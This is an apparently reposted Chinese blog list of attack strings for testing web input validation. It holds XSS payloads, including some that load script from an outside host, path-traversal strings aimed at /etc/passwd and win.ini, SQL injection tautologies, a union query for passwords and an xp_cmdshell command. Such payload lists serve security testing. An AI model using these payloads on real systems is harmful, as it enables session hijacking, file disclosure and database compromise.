需要防范的XSS攻击：常见测试输入清单（除XSS外，列表中还包含路径遍历和SQL注入字符串），可用于检查输入校验与输出编码是否生效
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
原文地址:https://www.cnblogs.com/evlon/p/849543.html